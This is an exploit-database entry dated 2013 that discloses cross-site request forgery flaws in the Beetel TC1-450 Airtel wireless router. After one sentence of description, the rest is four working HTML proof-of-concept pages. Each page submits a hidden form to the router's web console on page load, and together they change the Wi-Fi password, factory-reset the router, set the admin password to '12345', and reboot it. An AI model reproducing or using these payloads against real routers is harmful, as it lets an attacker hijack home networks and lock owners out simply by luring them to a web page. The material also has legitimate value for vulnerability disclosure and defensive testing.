Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities

2013-12-16T00:00:00
ID 1337DAY-ID-21673
Type zdt
Reporter Samandeep Singh
Modified 2013-12-16T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            Technical Details
~~~~~~~~~~~~~~~~~~
Beetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
 
Exploit Code 
~~~~~~~~~~~~~
 
Change Wifi (WPA2/PSK) password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/home_wlan_1"
method="POST" name="form">
<input type="hidden" name="wlanWEBFlag" value="0">
<input type="hidden" name="wlan_APenable" value="1">
<input type="hidden" name="Countries_Channels" value="[Any Country]">
<input type="hidden" name="Channel_ID" value="00000000">
<input type="hidden" name="AdvWlan_slPower" value="High">
<input type="hidden" name="BeaconInterval" value="100">
<input type="hidden" name="RTSThreshold" value="2347">
<input type="hidden" name="FragmentThreshold" value="2346">
<input type="hidden" name="DTIM" value="1">
<input type="hidden" name="WirelessMode" value="802.11b+g">
<input type="hidden" name="WLSSIDIndex" value="1">
<input type="hidden" name="ESSID_HIDE_Selection" value="0">
<input type="hidden" name="ESSID" value="[SSID of WLAN]">
<input type="hidden" name="WEP_Selection" value="WPA2-PSK">
<input type="hidden" name="wlanWEPFlag" value="0">
<input type="hidden" name="wlanGEMTEKFlag" value="0">
<input type="hidden" name="wlanGEMTEKCMDFlag" value="0">
<input type="hidden" name="wlanGEMTEKDeactiveAPFlag" value="0">
<input type="hidden" name="wlanRadiusWEPFlag" value="0">
<input type="hidden" name="TKIP_Selection" value="AES">
<input type="hidden" name="PreSharedKey" value="[WIFI PASSWORD]">
<input type="hidden" name="WPARekeyInter" value="0">
<input type="hidden" name="WDSMode_Selection" value="0">
<input type="hidden" name="WDSEncryType_Selection" value="TKIP">
<input type="hidden" name="WDSKey" value="">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLAN_FltActive" value="0">
<input type="hidden" name="WLAN_FltAction" value="00000000">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00">
<input type="hidden" name="CountryChange" value="0">
</form>
</body>
</html>
 
 
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="1">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>
 
 
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_admin_1"
method="POST" name="form">
<input type="hidden" name="uiViewTools_Password" value="12345">
<input type="hidden" name="uiViewTools_PasswordConfirm" value="12345">
</form>
</body>
</html>
 
 
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="0">
<input type="hidden" name="Restart" value="RESTART">
</form>
</body>
</html>

#  0day.today [2018-02-18]  #